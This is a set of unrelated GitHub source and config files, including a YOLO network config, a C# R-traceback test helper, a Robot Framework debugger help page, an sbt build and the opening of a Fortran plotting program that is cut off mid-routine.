filters=256
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=512
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=256
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=512
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=1024
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=512
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=1024
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=512
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=1024
size=3
stride=1
pad=1
activation=leaky
#######
[convolutional]
batch_normalize=1
size=3
stride=1
pad=1
filters=1024
activation=leaky
[convolutional]
batch_normalize=1
size=3
stride=1
pad=1
filters=1024
activation=leaky
[route]
layers=-9
[convolutional]
batch_normalize=1
size=1
stride=1
pad=1
filters=64
activation=leaky
[reorg]
stride=2
[route]
layers=-1,-4
[convolutional]
batch_normalize=1
size=3
stride=1
pad=1
filters=1024
activation=leaky
[convolutional]
size=1
stride=1
pad=1
filters=425
activation=linear
[region]
anchors = 0.57273, 0.677385, 1.87446, 2.06253, 3.33843, 5.47434, 7.88282, 3.52778, 9.77052, 9.16828
bias_match=1
classes=80
coords=4
num=5
softmax=1
jitter=.3
rescore=1
object_scale=5
noobject_scale=1
class_scale=1
coord_scale=1
absolute=1
thresh = .6
random=1
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pkgmetadata SYSTEM "http://www.gentoo.org/dtd/metadata.dtd">
<pkgmetadata>
<maintainer type="project">
<email>haskell@gentoo.org</email>
<name>Gentoo Haskell</name>
</maintainer>
<longdescription>
A new all Haskell "tagged" DFA regex engine, inspired by libtre
</longdescription>
</pkgmetadata>
| {
"pile_set_name": "Github"
} |
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License. See LICENSE in the project root for license information.
using System;
using System.Collections;
using System.Collections.Generic;
using FluentAssertions.Equivalency;
using Microsoft.R.ExecutionTracing;
using Microsoft.R.StackTracing;
using NSubstitute;
namespace Microsoft.R.Host.Client.Test {
internal class TracebackBuilder : IReadOnlyList<IRStackFrame> {
public struct AnyType {
public static implicit operator string (AnyType any) => "<ANY>";
public static implicit operator int (AnyType any) => -1;
}
public static readonly AnyType Any = default(AnyType);
private readonly List<IRStackFrame> _frames = new List<IRStackFrame>();
private Func<EquivalencyAssertionOptions<IRStackFrame[]>, EquivalencyAssertionOptions<IRStackFrame[]>> _config = options => options;
public int Count {
get {
return _frames.Count;
}
}
public IRStackFrame this[int index] {
get {
return _frames[index];
}
}
public IEnumerator<IRStackFrame> GetEnumerator() {
return _frames.GetEnumerator();
}
IEnumerator IEnumerable.GetEnumerator() {
return _frames.GetEnumerator();
}
public EquivalencyAssertionOptions<IRStackFrame[]> Configure(EquivalencyAssertionOptions<IRStackFrame[]> options) {
return _config(options);
}
public void Add(string fileName, int? lineNumber, string call, string environmentName) {
string itemPath = "[" + _frames.Count + "].";
var frame = Substitute.For<IRStackFrame>();
if (fileName != Any) {
frame.FileName.Returns(fileName);
}
if (lineNumber != Any) {
frame.LineNumber.Returns(lineNumber);
}
if (call != Any) {
frame.Call.Returns(call);
}
if (environmentName != Any) {
frame.EnvironmentName.Returns(environmentName);
}
_frames.Add(frame);
var oldConfig = _config;
_config = options => {
options = oldConfig(options);
if (fileName != Any) {
options = options.Including(ctx => ctx.SelectedMemberPath == itemPath + nameof(IRStackFrame.FileName));
}
if (lineNumber != Any) {
options = options.Including(ctx => ctx.SelectedMemberPath == itemPath + nameof(IRStackFrame.LineNumber));
}
if (call != Any) {
options = options.Including(ctx => ctx.SelectedMemberPath == itemPath + nameof(IRStackFrame.Call));
}
if (environmentName != Any) {
options = options.Including(ctx => ctx.SelectedMemberPath == itemPath + nameof(IRStackFrame.EnvironmentName));
}
return options;
};
}
public void Add(string fileName, int lineNumber, string call) {
Add(fileName, lineNumber, call, Any);
}
public void Add(string fileName, int lineNumber) {
Add(fileName, lineNumber, Any);
}
public void Add(SourceFile sourceFile, int lineNumber, string call, string environmentName) {
Add(sourceFile.FilePath, lineNumber, call, environmentName);
}
public void Add(SourceFile sourceFile, int lineNumber, string call) {
Add(sourceFile.FilePath, lineNumber, call);
}
public void Add(SourceFile sourceFile, int lineNumber) {
Add(sourceFile.FilePath, lineNumber);
}
public void Add(RSourceLocation location, int offset, string call) {
Add(location.FileName, location.LineNumber + offset, call);
}
public void Add(RSourceLocation location, int offset = 0) {
Add(location.FileName, location.LineNumber + offset, Any);
}
public void Add(RSourceLocation location, string call) {
Add(location.FileName, location.LineNumber, call);
}
}
}
| {
"pile_set_name": "Github"
} |
<?php
/*
Template Name: Page No Title
*/
get_header(); ?>
<?php
if( have_posts() ):
while( have_posts() ): the_post(); ?>
<h1>This is my Static Title</h1>
<small>Posted on: <?php the_time('F j, Y'); ?> at <?php the_time('g:i a'); ?>, in <?php the_category(); ?></small>
<p><?php the_content(); ?></p>
<hr>
<?php endwhile;
endif;
?>
<?php get_footer(); ?> | {
"pile_set_name": "Github"
} |
-----BEGIN CERTIFICATE-----
MIICQzCCAemgAwIBAgIQadOYD65Y3ytwRxqobjm2OTAKBggqhkjOPQQDAjBzMQsw
CQYDVQQGEwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxMNU2FuIEZy
YW5jaXNjbzEZMBcGA1UEChMQb3JnNS5leGFtcGxlLmNvbTEcMBoGA1UEAxMTY2Eu
b3JnNS5leGFtcGxlLmNvbTAeFw0xODA0MTcwMTI2NDFaFw0yODA0MTQwMTI2NDFa
MHMxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1T
YW4gRnJhbmNpc2NvMRkwFwYDVQQKExBvcmc1LmV4YW1wbGUuY29tMRwwGgYDVQQD
ExNjYS5vcmc1LmV4YW1wbGUuY29tMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE
UPoXa8KJUqd4FXX6RvUsoKVdZHK1fQztQKhCyMOwFAVwhsGGEGp0Dw+vLbU7iE3R
bjjy0v9Wi9JoKh3ViSkMH6NfMF0wDgYDVR0PAQH/BAQDAgGmMA8GA1UdJQQIMAYG
BFUdJQAwDwYDVR0TAQH/BAUwAwEB/zApBgNVHQ4EIgQgPrnZYjpqEW5QkPNtCBin
uuk0WGD3EaqkfnkgZpBfyvQwCgYIKoZIzj0EAwIDSAAwRQIhAPVAZs87tHhDlreT
0iOmPJgv5XJ6s85uK59jHARu0YlvAiBlGksg8HkuJVK4GDCSPTFEINH4FgD8h3dO
Z11etT6MDw==
-----END CERTIFICATE-----
| {
"pile_set_name": "Github"
} |
<html>
<head>
<link href="PLUGINS_ROOT/org.robotframework.ide.eclipse.main.plugin.doc.user/help/style.css" rel="stylesheet" type="text/css"/>
</head>
<body>
<a href="RED/../../../../../help/index.html">RED - Robot Editor User Guide</a> > <a href="RED/../../../../../help/user_guide/user_guide.html">User guide</a> > <a href="RED/../../../../../help/user_guide/launching.html">Launching Tests</a> > <a href="RED/../../../../../help/user_guide/launching/debug.html">Debugging Robot</a> >
<h2>Hitting a breakpoint during debug execution</h2>
<p>Whenever debugger suspends the execution there are many useful informations presented to user as well as new
opportunities to influence the running tests appear. First of all the toolbar buttons gets activated:
</p>
<img src="images/debug_toolbar.png"/>
<p>moving from left to right:</p>
<ul>
<li><b>Skip All Breakpoints</b> - allow to continue execution onwards without stopping on defined breakpoints
(globally disabling all the breakpoints)
</li>
<li><b>Resume</b> - <kbd>F8</kbd> described in <a href="../exec_control.html">Controlling execution</a></li>
<li><b>Suspend</b> - as above</li>
<li><b>Terminate</b> - <kbd>Ctrl</kbd>+<kbd>F2</kbd> as above</li>
<li><b>Disconnect</b> - as above</li>
<li><b>Step Into</b> - <kbd>F5</kbd> - each <kbd>F5</kbd> key press will execute active line and move to next
one. If active line consists Keyword or embedded TestCase, test executor will jump into item and execute
it line by line. To exit from executing inherited items use Step Return (<kbd>F7</kbd>)</li>
<li><b>Step Over</b> - <kbd>F6</kbd> - each <kbd>F6</kbd> key press will execute active line and move to next
one. If keyword exists in current line, keyword result will be returned without going into Keyword content</li>
<li><b>Step Return</b> - <kbd>F7</kbd> - allows to return to main TestCase execution from embedded TestCase
or Keyword if Step Into was used before</li>
</ul>
<h3>Debug view</h3>
<p>When execution is suspended the <b>Debug</b> view shows all the frames on current path in execution tree.
Bottom part of this path directly corresponds to the tree which can be seen in <b>Execution</b> view as
depicted below:
</p>
<img src="images/debug_debug_view.png"/><br/>
<img src="images/debug_execution_view.png"/>
<p>The bottom frame corresponds to <code>Project</code> suite (this is a directory in file system, so there is a
little directory decoration visible). Next frame corresponds to <code>Calculations</code> suite (which is a
<code>calculations.robot</code> file) and the frame above it represents <code>Divisions</code> test inside that
suite. Next frames do not correspond to any node inside the execution tree visible in <b>Execution</b> view. It
can be read that stopped execution is currently inside <code>Divisions</code> test at instruction in line
<code>35</code>, which called a keyword <code>Divide</code> which then called another keyword
<code>BinaryDivision</code> from line <code>57</code> which finally called library keyword <code>Evaluate</code>
coming from <code>BuiltIn</code> library at line <code>61</code>.
</p>
<p>Additionally you may see that there is a single execution thread (RF executes tests in single thread); the
execution is suspended and agent is communicating with RED using localhost at port <code>59344</code>.
</p>
<h3 id="debug_shell_view">Debug Shell view</h3>
<p>Whenever execution is suspended and a frame inside <b>Debug</b> view is selected then it is possible to use
<b>Debug Shell</b> view in order to evaluate different expressions. The view is not opened in <b>Debug</b>
perspective by default and needs to be opened using <a class="command" href="javascript:executeCommand('org.eclipse.ui.views.showView(org.eclipse.ui.views.showView.viewId=org.robotframework.ide.DebugShell)')">
Window -> Show View -> Other... -> Robot -> Debug Shell</a>.
</p>
<img src="images/debug_shell.png"/>
<p>The view allows to evaluate expressions in 3 modes:
</p>
<ul>
<li><b>ROBOT</b> in which <b>keyword</b> calls can be executed; under the hood it uses <code>BuiltIn.Run Keyword</code>
keyword from standard library,
</li>
<li><b>VARIABLE</b> in which variable-like expressions can be evaluated,
</li>
<li><b>PYTHON</b> which allows to evaluate Python expressions; under the hood the expression is passed to
<code>BuiltIn.Evaluate</code> keyword which effectively calls Python <code>eval()</code>.
</li>
</ul>
<p>Switching between modes is done using view buttons or through <kbd>Ctrl + T</kbd> shortcut. The view
remembers last 5 exuected expressions so it is possible to switch between them using up/down arrows.
In <b>ROBOT</b> and <b>PYTHON</b> mode it is possible to continue expression in multiple lines using
<kbd>Shift+Enter</kbd> keys.
</p>
<h3>Variables view</h3>
<p>Whenever you select some frame inside <b>Debug</b> view the Robot variables defined inside it are shown in
<b>Variables</b> view. This view handles scalar, list and dictionary variables. The scalar variable only shows
its value while the other two types are showing also the their contents inside it. Depending on the type of
variable the icon have different color assigned as visible on image below:
</p>
<img src="images/debug_variables.png"/>
<p>As you can see some of the variables are displayed under <b>Automatic Variables</b> node. This is a place
where all the variables which are built-in into the Robot are gathered together (refer to <a class="external" href="http://robotframework.org/robotframework/latest/RobotFrameworkUserGuide.html#built-in-variables" target="_blank">
RF User Guide</a>). All the user variables are displayed on top-level.
</p>
<p>Variable scope (see <a class="external" href="http://robotframework.org/robotframework/latest/RobotFrameworkUserGuide.html#variable-scopes" target="_blank">
User Guide</a> on this topic) is reflected in this view using icon decoration: <b>G</b>, <b>S</b>, <b>T</b> or <b>L</b>
is placed on variable icon for <b>Global</b>, <b>Suite</b>, <b>Test</b>, <b>Local</b> scopes. You may find out
that global-scoped variables are visible for every single stack frame, suite-scoped variables are only visible
in a suite frame and frames below, test-scoped variables only in test frame and below while local-scoped variables
only in current frame. Of course for example <code>${SUITE_NAME}</code> automatic variable (which has suite scope)
may be visible for all suite frames, however it may have different values as the suites are nested.
</p>
<p>For both dictionaries and lists the actual type of the python object is written in <b>Value</b> column. On the picture above
<b>DotDict[3]</b> for <code>&{dictionary}</code> variable mean that in python this object has type <b>DotDict</b>,
the rest mean that there are <code>3</code> elements inside it. Lists are labeled in the same way.
Additionally you may display <b>Actual Type</b> column which would also show types of
objects for scalar variables and for objects inside list/dictionaries. To do it click on arrow icon in the top
right corner of the Variables view, choose <b><code>Layout -> Select Columns...</code></b> and select <b>Actual Type</b>
column.
</p>
<p>Variables are send from Robot to RED every time when RED is ordered to suspend the execution. Sometimes you may observe
that variables are highlighted with yellow color:
</p>
<img src="images/debug_vars_changed.png"/>
<p>
This mean that variable <code>${scalar}</code> either changed the value comparing to previous time when variables
were send to RED or it didn't existed previously. Same highlighting will be used if you manually change the value.
</p>
<h3>Changing variables</h3>
<p>Apart from displaying variables, it is possible to change their values when execution gets suspended.
This can be done through <b>Variables</b> view in 3 possible ways:
</p>
<ul>
<li>by editing the cell with value in <b>Value</b> column,
</li>
<li>by choosing <b>Change Value...</b> from context menu of selected variable,
</li>
<li>inside the panel at the bottom of <b>Variables</b> view.
</li>
</ul>
<h4>Variable types</h4>
<p>Scalar variables are assigned with provided value. In case of lists or dictionaries just use usual RobotFramework
separators in order to provide whole new list/dictionary. For example writing:
</p>
<code>1 2 3 4
</code>
<p>for list - variable will create a new list consisting 4 elements while writing:
</p>
<code>a=1 b=2 c=3
</code>
<p>for dictionary - variable will create a new dictionary consisting 3 key-value pairs. Alternatively list or
dictionary elements may be provided in comma-separated syntax using brackets:</p>
<code>[1,2,3,4]</code> and: <code>{a=1,b=2,c=3}</code>
<p>for lists and dictionaries respectively.
</p>
<dl class="note">
<dt>Note</dt>
<dd>Beside changing values of top-level variables it is also possible to change the values inside the lists or
dictionaries just the way it is described above.
</dd>
</dl>
<p>If the value changes successfully the whole variable will be highlighted with yellow color, otherwise
you will be presented with error message in case of problems.
</p>
<h3>Editor</h3>
<p>After suspension you may open source file related to any frame by double clicking on it. By default editor for
top frame is opened. Of course some frames may not have related source (for example frame representing a suite made
from directory). Remember that RED debugger only supports debugging Robot code so you will not be able to debug
python code for library keywords (you may however setup a session in which <a href="robot_python_debug.html">both
RF & python code is debugged</a>). Frames created for library keywords have special kind of editor which
allows to find the source code for this keyword.
</p>
<img src="images/debug_editor.png"/>
<h4>Instruction pointers</h4>
<p>The editor opened for any frame displays <b>instruction pointer</b> - by default it's a green background
displayed in line which relates to chosen stack frame. You may also notice that instruction pointer for
top frame is a bit darker than pointers for other frames. The way the instruction pointers are displayed can be configured
in preferences: <code><a class="command" href="javascript:executeCommand('org.eclipse.ui.window.preferences(preferencePageId=org.eclipse.ui.editors.preferencePages.Annotations)')">
General -> Editors > Text Editors > Annotations</a></code> (change annotations <b>Debug Call Stack</b> for
ordinary frame or <b>Debug Current Instruction Pointer</b> for top frame)
</p>
<p>You may also encounter situation in which current frame is somehow erroneous. This situation is rather unusual
in local launches (although may happen) but it can be more common in remote debugging sessions. There may be many
different causes for such debugging errors but in general it happens when remote code under execution differs
from the code found locally in RED workspace. For example picture below presents situation in which remotely
executing <code>types.robot</code> suite calls <code>Log</code> keyword, but in local code there is a call to
<code>Log many</code> keyword. As you can see instruction pointer in this situation is RED and there is a problem
explanation when you hover the cursor over the problematic line.
</p>
<img src="images/debug_editor_error.png"/>
<p>Similarly as with usual instruction pointer the outlook of erroneous annotations can be also changed in preferences
(look for <b>Red Erroneous Debug Call Stack</b> and <b>Red Erroneous Debug Current Instruction Pointer</b>).
</p>
<h4>Showing variables</h4>
<p>The editor shows current values of variables when hovering mouse cursor over any variable name. This is depicted
on image above, where <code>${scalar}</code> variable is shown to have current value of <code>100</code>.
</p>
<h4 id="assist_editor">Assistance editor</h4>
<p>Library keyword frames do not display the code, but instead special kind of <b>debugger assistance</b> editor
is used. For example if you <b>Step Into</b> the library keyword you will see following editor opened:
</p>
<img src="images/debug_assist_editor.png"/>
<p>One may change <a href="preferences.html">Debugger preferences</a> in order to never suspend inside the
library keyword this way.
</p>
<p>Additionally assistance editor may also describe erroneous debugger states if there is no source in which
instruction pointer can be shown. You may found yourself in this situation even in local launches when your test
call some unknown keyword:
</p>
<img src="images/debug_assist_editor_error.png"/>
<h3>Continuing</h3>
<p>Whenever you're ready to resume tests execution simply hit <b>Resume</b> button (or <kbd>F8</kbd>) and
debugger will suspend on next breakpoint or in next erroneous state (if not disabled in preferences) or whenever
you explicitly pause the execution. Apart from that you may perform step. There are 3 kinds of steps:
</p>
<ul>
<li><b>Step Into</b> <kbd>F5</kbd> - this kind of step is only possible for top stack frame. When performing
<b>step into</b> the execution will resume only for a single step which will enter inside into the keyword from current
line.
<p></p></li>
<li><b>Step Over</b> <kbd>F6</kbd> - this kind of step is possible for every frame on stack and it will
behave differently for each of them. In general this kind of step means 'suspend the execution on next keyword
from instruction pointed by selected stack frame on the same level'.
<p></p></li>
<li><b>Step Return</b> <kbd>F7</kbd> - similarly to <b>Step Over</b> this action is possible for every frame
on stack and will have different behavior. This kind of step means 'suspend the execution on next keyword which
will be executed after selected frame have ended'. For frame related to user keyword this mean that debugger
will pause on next instruction after this user keyword ends. For test-related frame the debugger will suspend
at the very first instruction in next test (if any). For suite-related frame the debugger will suspend at very
first keyword in next suite (if any).
<p></p></li>
</ul>
<p>Of course the debugger will suspend if it encounter e.g. breakpoint inside the code which should be stepped over.
</p>
</body>
</html> | {
"pile_set_name": "Github"
} |
import Common._
import Unfiltered._
import Dependencies._
import ReleaseTransformations._
Common.settings
enablePlugins(ScalaUnidocPlugin)
// unidoc publish settings
name := "unfiltered-all"
artifacts := Classpaths.artifactDefs(Seq(packageDoc in Compile)).value
packagedArtifacts := Classpaths.packaged(Seq(packageDoc in Compile)).value
Defaults.packageTaskSettings(
packageDoc in Compile, (unidoc in Compile).map{_.flatMap(Path.allSubpaths)}
)
releaseCrossBuild := true
releaseProcess := Seq[ReleaseStep](
checkSnapshotDependencies,
inquireVersions,
runClean,
runTest,
setReleaseVersion,
commitReleaseVersion,
tagRelease,
releaseStepCommandAndRemaining("+publishSigned"),
releaseStepCommandAndRemaining("sonatypeBundleRelease"),
setNextVersion,
commitNextVersion,
pushChanges,
)
val specs2ProjectId = "specs2"
val scalatestProjectId = "scalatest"
val filterProjectId = "filter"
// avoid cyclic error
def dependsOnInTest(id: String) =
unmanagedClasspath in Test ++= (fullClasspath in (local(id), Compile)).value
val dependsOnSpecs2InTest = dependsOnInTest(specs2ProjectId)
lazy val library: Project = module("unfiltered")(
dirName = "library",
projectId = "unfiltered"
).settings(
description := "Core library for describing requests and responses",
dependsOnSpecs2InTest,
dependsOnInTest(scalatestProjectId),
dependsOnInTest(filterProjectId),
libraryDependencies ++= Seq(
"commons-codec" % "commons-codec" % commonsCodecVersion,
specs2Dep.value % "test",
"org.scalatest" %% "scalatest" % scalatestVersion % "test",
"org.scalatestplus" %% "scalacheck-1-14" % scalatestScalacheckVersion % "test",
),
libraryDependencies ++= {
CrossVersion.partialVersion(scalaVersion.value) match {
case Some((2, v)) if v >= 11 =>
Seq("org.scala-lang.modules" %% "scala-xml" % scalaXmlVersion)
case _ =>
Nil
}
}
).dependsOn(util)
lazy val directives = module("directives")().settings(
description := "monadic api for unfiltered"
).dependsOn(library, specs2 % "test")
lazy val filters = module(filterProjectId)().settings(
description := "Server binding for Java Servlet filters",
libraryDependencies += servletApiDep,
dependsOnSpecs2InTest
).dependsOn(library)
lazy val filtersAsync = module("filter-async")().settings(
description := "Server binding for Java Servlet 3.0 async filters",
libraryDependencies += servletApiDep
).dependsOn(filters, specs2 % "test")
lazy val agents = module("agents")(
srcPath = "unfiltered/request"
).settings(
description := "User-Agent request matchers",
libraryDependencies += "org.scalatest" %% "scalatest" % scalatestVersion % "test",
libraryDependencies ++= Seq(servletApiDep) ++ integrationTestDeps.value
).dependsOn(
library,
scalatest % "test",
filters % "test"
)
lazy val uploads = module("uploads")(
srcPath = "unfiltered/request"
).settings(
description := "Generic support for multi-part uploads",
libraryDependencies ++= Seq(
"commons-io" % "commons-io" % commonsIoVersion
) ++ integrationTestDeps.value
).dependsOn(library, specs2 % "test")
lazy val filterUploads = module("filter-uploads")(
srcPath = "unfiltered/request"
).settings(
description := "Support for multi-part uploads for servlet filters",
libraryDependencies ++= Seq(
servletApiDep,
"commons-fileupload" % "commons-fileupload" % commonsFileUploadVersion
) ++ integrationTestDeps.value
).dependsOn(uploads, filters, specs2 % "test")
lazy val util = module("util")().settings(
libraryDependencies += specs2Dep.value % "test"
)
lazy val jetty = module("jetty")().settings(
description := "Jetty server embedding module",
libraryDependencies := Seq(
"org.eclipse.jetty" % "jetty-webapp" % jettyVersion
)
).dependsOn(util)
lazy val nettyServer = module("netty-server")(
srcPath = "unfiltered/netty"
).settings(
description := "Netty server embedding module",
dependsOnSpecs2InTest,
libraryDependencies += "javax.activation" % "activation" % javaxActivationVersion,
libraryDependencies ++= integrationTestDeps.value
).dependsOn(netty, util)
lazy val netty = module("netty")().settings(
description := "Netty server binding module",
dependsOnSpecs2InTest,
libraryDependencies ++= {
("io.netty" % "netty-codec-http" % nettyVersion) +:
("io.netty" % "netty-handler" % nettyVersion) +:
("io.netty" % "netty-transport-native-epoll" % nettyVersion classifier "linux-x86_64") +:
("io.netty" % "netty-transport-native-kqueue" % nettyVersion classifier "osx-x86_64") +:
integrationTestDeps.value
}
).dependsOn(library)
lazy val specs2: Project = module(specs2ProjectId)().settings(
description := "Facilitates testing Unfiltered servers with Specs2",
libraryDependencies ++= {
specs2Dep.value :: okHttp
}
).dependsOn(filters, jetty, nettyServer)
lazy val scalatest = module(scalatestProjectId)().settings(
description := "Facilitates testing Unfiltered servers with ScalaTest",
libraryDependencies ++= {
okHttp :+
("org.scalatest" %% "scalatest-core" % scalatestVersion)
}
).dependsOn(filters, jetty, nettyServer)
lazy val json4s = module("json4s")(
srcPath = "unfiltered"
).settings(
description := "Json4s request matchers and response functions",
libraryDependencies ++= {
Seq("org.json4s" %% "json4s-native" % json4sVersion) ++ integrationTestDeps.value
}
).dependsOn(library, filters % "test", specs2 % "test")
lazy val websockets = module("netty-websockets")().settings(
description := "WebSockets plan support using Netty",
libraryDependencies ++= integrationTestDeps.value,
libraryDependencies += "com.ning" % "async-http-client" % asyncHttpClientVersion % "test"
).dependsOn(nettyServer, specs2 % "test")
lazy val nettyUploads = module("netty-uploads")().settings(
description := "Uploads plan support using Netty",
libraryDependencies ++= integrationTestDeps.value,
parallelExecution in Test := false
).dependsOn(nettyServer, uploads, specs2 % "test")
| {
"pile_set_name": "Github"
} |
require 'spec_helper'
describe "SignoutStories" do
let(:member) {
FactoryBot.create(:member, password: 'mala', password_confirmation: 'mala')
}
context "when sign in as a member" do
before { login_as(member) }
it {
click_on 'Sign Out'
expect(current_path).to be == '/login'
}
end
end
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2018 The WebRTC project authors. All Rights Reserved.
*
* Use of this source code is governed by a BSD-style license
* that can be found in the LICENSE file in the root of the source
* tree. An additional intellectual property rights grant can be found
* in the file PATENTS. All contributing project authors may
* be found in the AUTHORS file in the root of the source tree.
*/
#ifndef MODULES_CONGESTION_CONTROLLER_BBR_TEST_BBR_PRINTER_H_
#define MODULES_CONGESTION_CONTROLLER_BBR_TEST_BBR_PRINTER_H_
#include <memory>
#include "modules/congestion_controller/bbr/bbr_factory.h"
#include "modules/congestion_controller/bbr/bbr_network_controller.h"
#include "modules/congestion_controller/test/controller_printer.h"
namespace webrtc {
class BbrStatePrinter : public DebugStatePrinter {
public:
BbrStatePrinter();
~BbrStatePrinter() override;
void Attach(bbr::BbrNetworkController*);
bool Attached() const override;
void PrintHeaders(FILE* out) override;
void PrintValues(FILE* out) override;
NetworkControlUpdate GetState(Timestamp at_time) const override;
private:
bbr::BbrNetworkController* controller_ = nullptr;
};
class BbrDebugFactory : public BbrNetworkControllerFactory {
public:
explicit BbrDebugFactory(BbrStatePrinter* printer);
std::unique_ptr<NetworkControllerInterface> Create(
NetworkControllerConfig config) override;
bbr::BbrNetworkController* BbrController();
private:
BbrStatePrinter* printer_;
bbr::BbrNetworkController* controller_ = nullptr;
};
} // namespace webrtc
#endif // MODULES_CONGESTION_CONTROLLER_BBR_TEST_BBR_PRINTER_H_
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<appSettings>
<add key="webPages:Enabled" value="false" />
<add key="ViewCache:Enabled" value="false" />
<add key="ViewPath:Value" value="Views" />
<add key="ViewRecursiveDiscovery:Enabled" value="true" />
</appSettings>
</configuration>
| {
"pile_set_name": "Github"
} |
INCLUDE 'VICMAIN_FOR'
SUBROUTINE MAIN44
C PROGRAM QPLOT2
C 10 JUL 95 ...CRS (CRI) MST S/W CONVERSION (VICAR PORTING)
C 22 AUG 85 ...JHR... CONVERTED TO VICAR2, RENAMED QPLOT2
C 22 APR 82 ...JHR... INITIAL RELEASE
C E,QPLOT2,IN,*,,PARAMS
C THIS PROGRAM PLOTS LINES OF DN VS RELATIVE SAMPLE NUMBER.
C A MAXIMUM OF 10 LINES MAY BE PLOTTED ON THE GRAPH
C A MAXIMUM OF 10 DATA SETS MAY BE USED
C ANY LINE DIRECTION MAY BE SPECIFIED
C IF THE LINE DIRECTION IS NOT HORIZONTAL OR VERTICAL
C THE OUTPUT SAMPLE POINTS ARE SPACED THE SAME AS THE X AND Y
C AXES, I.E. IF THE LINE DIRECTION IS 45 DEGREES THE NUMBER OF
C OUTPUT SAMPLES WILL BE THE SQUARE ROOT OF 2 TIMES THE NUMBER
C OF INPUT SAMPLES
C
C * PROCESS IN,SL,SS,EL,ES SPECIFIES THE INPUT NUMBER,
C STARTING LINE, STARTING SAMPLE, ENDING LINE, AND
C ENDING SAMPLE.
C
C
implicit none
EXTERNAL EQUIV
COMMON/C1/ SIZE,displace,RDS,XMIN,XMAX,YMIN,YMAX
& ,XSCLMN,XSCLMX,YSCLMN,YSCLMX,XSCLDT
& ,YSCLDT,XLNGTH,YLNGTH,FORMAT,NORM,NCHAN
& ,xsclset,ysclset
COMMON/C2/ SL,SS,EL,ES,IN,UNIT,ILINE,NLINES
& ,NLI,NSI,NSCHAN,GTYPE,XPAGE,LB,LABTOP
common/files/filename
common/commonheader/headermsg,nheadermsg,iiline,i2line
integer*4 iiline,i2line,nheadermsg(220) !! index into header strings
INTEGER*4 IN(10),SL(10),SS(10),EL(10),ES(10),UNIT(10)
INTEGER*4 GTYPE,TTLTOP,NLI(10),NSI(10),NBI(10)
integer*4 STAT,IPARM(256),TICS
integer*4 i,ii,j,jj,n,icount,idef,iline,ind,isize,psize
integer*4 labtop,lcheck,lx,ly,lb,ni,nlines,np,nschan,ntest
integer*4 ntics,ntitle,ntitx,ntity,nx,ny,nchan,naline
integer*4 plotwid,plotht,ntbl,nplotgpi,nplotout
integer*4 nplotgpi2,nploteps,ntmptbl,charsize,charsteps
integer*4 pttype(20),lntype(20),ptcolorl(20)
REAL*4 RPARM(256),XAXIS(4),YAXIS(4)
REAL*4 XMAX(10),XMIN(10),YMAX(10),YMIN(10)
REAL*4 XSCLMN,XSCLMX,YSCLMN,YSCLMX,XLNGTH,YLNGTH
real*4 displace,rds,size,xpage,xscldt,yscldt
logical*4 XVPTST, NORM, xsclset, ysclset, epsplot, nolabel
character*1 LPARM(1024)
character*4 FORMAT(10),aline
character*8 plotfmt
character*24 tbl,tmptbl
character*30 alinenum
CHARACTER*63 XTTL,YTTL,TTL,CBUF,XTITLE,YTITLE,TITLE
character*63 msg,plotgpi,plotgpi2,ploteps
character*56 headermsg(220) !! Labels * (lines per label+2)
CHARACTER*63 plotout
character*120 filename(10)
c
character*8 ptcolor(20),lncolor(20)
character*4 gpi/'.gpi'/,eps/'.eps'/,asc/'.asc'/
c
character*1 num(5)
character bash
c
data num/'1','2','3','4','5'/
data tmptbl/'tmptbl.'/
data aline/'line'/
C
data pttype/ 5, 9, 7,13,11, 1, 2, 3, 5, 9, 7,13,11, 1, 2, 3, 5, 9, 7,13/
data lntype/ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1/
data ptcolor/'green','purple','magenta','blue','brown',
1 'red','cyan','orange','green','purple',
2 'magenta','blue','brown','red','cyan',
3 'orange','green','purple','magenta','blue'/
data ptcolorl/5,6,7,4,5, 3,4,6,5,6, 7,4,5,3,4, 6,5,6,7,4/
data lncolor/'beige','red','green','cyan','purple',
1 'blue','orange','magenta','beige','red',
2 'green','cyan','purple','blue','orange',
3 'magenta','beige','red','green','cyan'/
c
call xvmessage('qplot2 version 2015-08-19',' ')
bash=achar(92)
C
C SET DEFAULTS AND INITIALIZE
c tbl='tmptbl.x'
c ntbl=index(tbl,' ') - 1
YTITLE = 'DN VALUE'
XTITLE = 'RELATIVE SAMPLE NUMBER'
TITLE = 'IPL LINE PLOT'
C 'PLOTNAME'
epsplot=.false.
nplotgpi = 0
nplotgpi2 = 0
nplotout = 0
nploteps = 0
ntbl = 0
epsplot = .false.
CALL XVPARM ('PLOTFMT',plotfmt,icount,idef,1)
if (plotfmt .eq. 'EPS' .or. plotfmt .eq. 'eps') epsplot = .true.
PLOTOUT= 'qplot.eps'
nplotout=index(plotout,' ') - 1
plotgpi= 'qplot.gpi'
nplotgpi=index(plotgpi,' ') - 1
plotgpi2= 'qplot.eps.gpi'
nplotgpi2=index(plotgpi2,' ') - 1
tbl='qplot.asc'
ntbl = index(tbl,' ') - 1
CALL XVPARM('PLOTOUT',cbuf,ICOUNT,IDEF,1)
IF (IDEF .EQ. 0) THEN
if (cbuf .eq. "YES" .or. cbuf .eq."yes") then
c epsplot = .true.
plotout='qplot'
nplotout=index(plotout,' ') - 1
plotgpi=plotout(1:nplotout)//gpi
nplotgpi=index(plotgpi,' ') - 1
